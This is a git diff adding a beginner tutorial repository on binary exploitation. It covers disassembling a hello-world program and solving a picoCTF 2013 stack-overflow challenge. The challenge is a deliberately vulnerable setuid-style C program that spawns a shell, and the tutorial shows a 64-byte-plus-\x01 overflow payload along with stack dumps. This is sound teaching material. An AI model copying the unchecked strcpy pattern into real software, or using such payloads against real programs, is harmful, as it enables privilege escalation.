28 changes: 26 additions & 2 deletions README.md
Original file line number Diff line number Diff line change
@@ -1,2 +1,26 @@
# how2exploit_binary
An in depth tutorial on how to do binary exploitation
### A note from the creator
Greetings, fellow hacker, hobbyist, or computer enthusiast. If you've been
looking for a place to start learning binary exploitation, then you're in luck.
I'm someone who is just barely better than "incompetent," and I'll be
explaining how I learned my skills. These tutorials will be a bit long-winded,
but hopefully they will be informative and entertaining. Please feel free to
contact me about any clarifications that should be included in the tutorials.

**This is intended for Linux, which is free if you don't already have it. Don't
want to dual boot? Get a VM.**

-Best of luck

bert88sta

# how2exploit_binary: get your hack on.

## Introductory Tutorials:

* [Intro 1: What is a binary, really?](intro-1)
* [Intro 2: Screwing around with the stack](intro-2)

## Buffer Overflows:

* [1: The power of SEGFAULT](overflow-1)
* [2: Build your own `system()`](overflow-2)
83 changes: 83 additions & 0 deletions intro-1/README.md
@@ -0,0 +1,83 @@
# Intro 1: What is a binary, really?

In short, a binary is what you get when you take high-level code such as C or
C++ and compile it into something the computer can actually run. I believe in
hands-on learning, so let's take a look inside one to really find out.

Consider the file [hello_world.c](hello_world.c):
```C
#include<stdio.h>
int main() {
    printf("Hello World!\n");
}
```

This is your average C file, more or less. It's got a main, an include, and
a little bit of code to be run. However, your computer can't run the source
text directly. To turn it into something executable, we compile it:
```
$ gcc -m32 hello_world.c -o hello_world.bin
```
You can ignore the `-m32` argument for now (you'll learn about it later);
`-o hello_world.bin` simply specifies the name of the output file.

From here, we can execute it:
```
$ ./hello_world.bin
Hello World!
```
Unsurprisingly, we get "Hello World!" as the output. But let's go a bit deeper.
We can open gdb (GNU Debugger) and see what's happening under the hood:
```
$ gdb -q ./hello_world.bin
Reading symbols from ./hello_world.bin...(no debugging symbols found)...done.
gdb-peda$ disas main
Dump of assembler code for function main:
0x0804841d <+0>: push %ebp
0x0804841e <+1>: mov %esp,%ebp
0x08048420 <+3>: and $0xfffffff0,%esp
0x08048423 <+6>: sub $0x10,%esp
0x08048426 <+9>: movl $0x80484d0,(%esp)
0x0804842d <+16>: call 0x80482f0 <puts@plt>
0x08048432 <+21>: leave
0x08048433 <+22>: ret
End of assembler dump.
gdb-peda$ quit
```
First, your prompt probably looks like `(gdb)`, whereas mine is `gdb-peda$`.
Don't worry about this; my gdb is modified with the PEDA extension.

The weird stuff that gdb showed us is called assembly language. It's
essentially the lowest-level human-readable code out there. Each line of that
code maps one-to-one to a machine instruction. Let me break this down for
you.

```
0x0804841d <+0>: push %ebp
0x0804841e <+1>: mov %esp,%ebp
0x08048420 <+3>: and $0xfffffff0,%esp
0x08048423 <+6>: sub $0x10,%esp
```
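First, the numbers you see on the left are addresses. Just like your house
address, `0x0804841d` is where the instruction `push %ebp` lives. These
first four instructions are the standard setup at the start of a function (the
function prologue), in this case `main()`: they save the caller's frame
pointer, start a new stack frame, align the stack, and reserve 16 bytes on it.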
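
If the address column still feels abstract, here is a small sketch (Python 3, not part of the original tutorial) that takes the eight addresses from the `disas main` listing and works out two things: each instruction's offset from the start of `main`, and how many bytes each instruction occupies. The variable names are my own, and the sizes are simply inferred from the gap between one address and the next.

```python
# Addresses copied from the `disas main` output in this tutorial.
addresses = [
    0x0804841d,  # push %ebp
    0x0804841e,  # mov %esp,%ebp
    0x08048420,  # and $0xfffffff0,%esp
    0x08048423,  # sub $0x10,%esp
    0x08048426,  # movl $0x80484d0,(%esp)
    0x0804842d,  # call puts@plt
    0x08048432,  # leave
    0x08048433,  # ret
]

base = addresses[0]  # address of the first instruction of main, i.e. <+0>

# Offset of each instruction from the start of main (gdb's <+N> column).
offsets = [addr - base for addr in addresses]

# Size in bytes of every instruction except the last one, taken as the
# gap between its address and the address of the next instruction.
sizes = [nxt - cur for cur, nxt in zip(addresses, addresses[1:])]

print("offsets:", offsets)
print("sizes:  ", sizes)
```

The offsets come out as 0, 1, 3, 6, 9, 16, 21, 22, which is exactly the `<+N>` column gdb printed. The sizes also show that x86 instructions are not all the same length: `push %ebp` takes one byte, while the `movl` takes seven.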

```
0x08048426 <+9>: movl $0x80484d0,(%esp)
0x0804842d <+16>: call 0x80482f0 <puts@plt>
```

These instructions are what actually print our "Hello World!". The program
moves the address of the string "Hello World!" into the memory that `%esp`
points to. `%esp` is a register: it holds four bytes of information for quick
access, in this case the address of the top of the stack. Our program then
calls `puts()`, which prints out whatever is at the address we supplied. (We
wrote `printf()`, but since the string has no format specifiers and ends in a
newline, gcc swapped in the simpler `puts()`.)
```
0x08048432 <+21>: leave
0x08048433 <+22>: ret
```

Finally, these last two just pass control from our `main()` back to the C
library, which does some cleaning up and then exits. We'll be learning more
about how these binaries function in later tutorials.
Binary file added intro-1/hello_world.bin
Binary file not shown.
5 changes: 5 additions & 0 deletions intro-1/hello_world.c
@@ -0,0 +1,5 @@
#include<stdio.h>

int main() {
    printf("Hello World!\n");
}
163 changes: 163 additions & 0 deletions intro-2/README.md
@@ -0,0 +1,163 @@
# Intro 2: Screwing around with the stack.

**Credit to [Picoctf 2013](2013.picoctf.com) for the binary and source used
here.**

Now that you've gotten your feet wet with binaries, it's time to dive in
headfirst. Consider the file [overflow1.c](overflow1-3948d17028101c40.c):
```C
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include "dump_stack.h"

void vuln(int tmp, char *str) {
    int win = tmp;
    char buf[64];
    strcpy(buf, str);
    dump_stack((void **) buf, 23, (void **) &tmp);
    printf("win = %d\n", win);
    if (win == 1) {
        execl("/bin/sh", "sh", NULL);
    } else {
        printf("Sorry, you lose.\n");
    }
    exit(0);
}

int main(int argc, char **argv) {
    if (argc != 2) {
        printf("Usage: stack_overwrite [str]\n");
        return 1;
    }

    uid_t euid = geteuid();
    setresuid(euid, euid, euid);
    vuln(0, argv[1]);
    return 0;
}
```
You can tell just by reading through it that the objective here is to make
`win == 1` true, but we're going to ignore that for a few minutes to learn
about the stack. The stack is a region of memory that the program uses to
store local variables, function arguments, saved return addresses, and all
sorts of other goodies. It grows and shrinks as functions are called and
return. For example:
```
$ ./overflow1-3948d17028101c40
Usage: stack_overwrite [str]
$ ./overflow1-3948d17028101c40 AAAA
Stack dump:
0xffd48bf4: 0xffd4a89b (second argument)
0xffd48bf0: 0x00000000 (first argument)
0xffd48bec: 0x0804870f (saved eip)
0xffd48be8: 0xffd48c18 (saved ebp)
0xffd48be4: 0xf7720000
0xffd48be0: 0xf762caa7
0xffd48bdc: 0x00000000
0xffd48bd8: 0xffd48c44
0xffd48bd4: 0xf7744500
0xffd48bd0: 0xffd48c18
0xffd48bcc: 0x00000000
0xffd48bc8: 0x00000000
0xffd48bc4: 0xf7720000
0xffd48bc0: 0xffffffff
0xffd48bbc: 0xf760b216
0xffd48bb8: 0x000000c2
0xffd48bb4: 0xf757f698
0xffd48bb0: 0xf7751938
0xffd48bac: 0xf762cad4
0xffd48ba8: 0x000003e8
0xffd48ba4: 0x000003e8
0xffd48ba0: 0xffd48c00
0xffd48b9c: 0x41414141 (beginning of buffer)
win = 0
Sorry, you lose.
```
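
The addresses in that dump are worth a little arithmetic. The sketch below (Python 3, with names I made up for illustration) copies four labelled addresses from the dump and computes how far each one sits from the start of the buffer. Keep in mind that the absolute addresses are specific to this one run; only the distances between them are interesting.

```python
WORD = 4  # bytes per stack slot in a 32-bit process

# Addresses copied from the stack dump of the "AAAA" run.
buffer_start = 0xffd48b9c     # (beginning of buffer)
saved_ebp = 0xffd48be8        # (saved ebp)
saved_eip = 0xffd48bec        # (saved eip)
second_argument = 0xffd48bf4  # (second argument), the top row of the dump


def offset_from_buffer(address):
    """Distance in bytes from the start of the buffer to `address`."""
    return address - buffer_start


# Number of 4-byte rows between the buffer start and the top row, inclusive.
rows_in_dump = (second_argument - buffer_start) // WORD + 1

print("saved ebp is", offset_from_buffer(saved_ebp), "bytes past the buffer start")
print("saved eip is", offset_from_buffer(saved_eip), "bytes past the buffer start")
print("rows in the dump:", rows_in_dump)
```

This puts the saved `ebp` 76 bytes past the start of the buffer and the saved `eip` 80 bytes past it, even though `buf` itself is only 64 bytes long. The dump covers 23 four-byte rows, which lines up with the `23` passed to `dump_stack()` in the source (I'm assuming that argument is a row count, since `dump_stack.h` isn't shown).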
Now if you know a thing or two about ASCII, you'll know that 0x41 is the value
of "A". At the bottom of the stack dump, you'll notice that the beginning of
the buffer contains 0x41414141, or our four A's. Now we can run it again, only
this time we'll put a few more. Pay attention to the addresses on the left :)
```
$ ./overflow1-3948d17028101c40 $(python -c 'print "A"*76')
Stack dump:
0xfff577d4: 0xfff58853 (second argument)
0xfff577d0: 0x00000000 (first argument)
0xfff577cc: 0x0804870f (saved eip)
0xfff577c8: 0xfff57700 (saved ebp)
0xfff577c4: 0x41414141
0xfff577c0: 0x41414141
0xfff577bc: 0x41414141
0xfff577b8: 0x41414141
0xfff577b4: 0x41414141
0xfff577b0: 0x41414141
0xfff577ac: 0x41414141
0xfff577a8: 0x41414141
0xfff577a4: 0x41414141
0xfff577a0: 0x41414141
0xfff5779c: 0x41414141
0xfff57798: 0x41414141
0xfff57794: 0x41414141
0xfff57790: 0x41414141
0xfff5778c: 0x41414141
0xfff57788: 0x41414141
0xfff57784: 0x41414141
0xfff57780: 0x41414141
0xfff5777c: 0x41414141 (beginning of buffer)
win = 1094795585
Sorry, you lose.
```
This bit: `$(python -c 'print "A"*76')` just makes Python print out 76 "A"s and
passes them to the program as its argument. (This is Python 2 syntax; with
Python 3, write `print("A"*76)` instead.) You'll notice that the addresses on
the left are completely different from the first run. This is normal. Most
Linux systems these days have ASLR enabled, a protection that randomizes stack
addresses from run to run. More interesting is that the program now reports
`win = 1094795585`. What just happened?
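
One way to make sense of that number is to stop reading it as decimal. This is a quick Python 3 check, not part of the original walkthrough; the only assumption is that `win` is a 4-byte little-endian integer, which is what you get for an `int` on 32-bit x86.

```python
value = 1094795585  # the number the program printed for `win`

# The same value written in hexadecimal.
as_hex = hex(value)

# The four bytes a little-endian machine stores in memory for this int.
as_bytes = value.to_bytes(4, "little")

print(as_hex)
print(as_bytes)
```

The hex form is `0x41414141` and the bytes are `AAAA`: the "random" value of `win` is just four of our own "A"s.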

Back to the source:
```C
char buf[64];
strcpy(buf, str);
```
Our buffer only holds 64 bytes. However, `strcpy()` is a dangerous function.
The string we provide contains 76 bytes, and `strcpy()` doesn't check
lengths. Instead, the extra 12 bytes that don't fit (plus the terminating null
byte) get written over whatever sits after the buffer on the stack. The value
of `win` is stored right next to our buffer, so let's try to set `win = 1`.
This is where things get a bit tricky. "1", as in the character, is 0x31. We
need to submit 0x01, which isn't printable. Since `win` is right next to our
buffer on the stack, we can just submit 64 "A"s, followed by one "\x01" that
spills into the first byte of `win`. x86 is little-endian, so that first byte
is the least significant one, and the rest of `win` is still zero.
```
$ ./overflow1-3948d17028101c40 $(python -c 'print "A"*64 + "\x01"')
Stack dump:
0xffe29f04: 0xffe2b85e (second argument)
0xffe29f00: 0x00000000 (first argument)
0xffe29efc: 0x0804870f (saved eip)
0xffe29ef8: 0xffe29f28 (saved ebp)
0xffe29ef4: 0xf7760000
0xffe29ef0: 0xf766caa7
0xffe29eec: 0x00000001
0xffe29ee8: 0x41414141
0xffe29ee4: 0x41414141
0xffe29ee0: 0x41414141
0xffe29edc: 0x41414141
0xffe29ed8: 0x41414141
0xffe29ed4: 0x41414141
0xffe29ed0: 0x41414141
0xffe29ecc: 0x41414141
0xffe29ec8: 0x41414141
0xffe29ec4: 0x41414141
0xffe29ec0: 0x41414141
0xffe29ebc: 0x41414141
0xffe29eb8: 0x41414141
0xffe29eb4: 0x41414141
0xffe29eb0: 0x41414141
0xffe29eac: 0x41414141 (beginning of buffer)
win = 1
$ ls
overflow1-3948d17028101c40 overflow1-3948d17028101c40.c README.md
$ exit
```

If you try this for yourself, you'll get a shell. You have successfully
manipulated the stack to give you what you want.
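
If you'd like to play with the idea without the binary, here is a rough model of the overwrite in Python 3. It is only a sketch under stated assumptions: the frame layout (64 bytes of `buf`, then `win`, then 8 more bytes, then saved `ebp` and saved `eip`) is read off the stack dumps in this tutorial, the frame starts out zero-filled, and `simulated_strcpy` and `win_after` are hypothetical helpers of mine, not anything from the real program or from libc.

```python
BUF_SIZE = 64          # char buf[64]
WIN_OFFSET = BUF_SIZE  # assumed from the stack dumps: win sits right after buf
FRAME_SIZE = 84        # buf + win + 8 bytes + saved ebp + saved eip


def simulated_strcpy(frame, src):
    """Copy src up to its first NUL, plus a terminating NUL, with no
    check against BUF_SIZE (mimicking what strcpy does)."""
    end = src.find(b"\x00")
    data = (src if end == -1 else src[:end]) + b"\x00"
    if len(data) > len(frame):
        raise ValueError("payload runs past the modelled frame")
    frame[0:len(data)] = data


def win_after(argument):
    """Return the value win would hold after copying `argument` into buf."""
    frame = bytearray(FRAME_SIZE)  # zero-filled, so win starts out as 0
    simulated_strcpy(frame, argument)
    # Read win back as a 4-byte little-endian integer, as x86 would.
    return int.from_bytes(frame[WIN_OFFSET:WIN_OFFSET + 4], "little")


print(win_after(b"AAAA"))                # fits in the buffer
print(win_after(b"A" * 76))              # the 76 "A"s run
print(win_after(b"A" * 64 + b"1"))       # the printable character "1"
print(win_after(b"A" * 64 + b"\x01"))    # the winning payload
```

The four results are 0, 1094795585, 49, and 1, matching the three runs above. The 49 shows why typing a plain "1" would not have worked: the character "1" is the byte 0x31.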
Binary file added intro-2/overflow1-3948d17028101c40
Binary file not shown.
32 changes: 32 additions & 0 deletions intro-2/overflow1-3948d17028101c40.c
@@ -0,0 +1,32 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include "dump_stack.h"

void vuln(int tmp, char *str) {
    int win = tmp;
    char buf[64];
    strcpy(buf, str);
    dump_stack((void **) buf, 23, (void **) &tmp);
    printf("win = %d\n", win);
    if (win == 1) {
        execl("/bin/sh", "sh", NULL);
    } else {
        printf("Sorry, you lose.\n");
    }
    exit(0);
}

int main(int argc, char **argv) {
    if (argc != 2) {
        printf("Usage: stack_overwrite [str]\n");
        return 1;
    }

    uid_t euid = geteuid();
    setresuid(euid, euid, euid);
    vuln(0, argv[1]);
    return 0;
}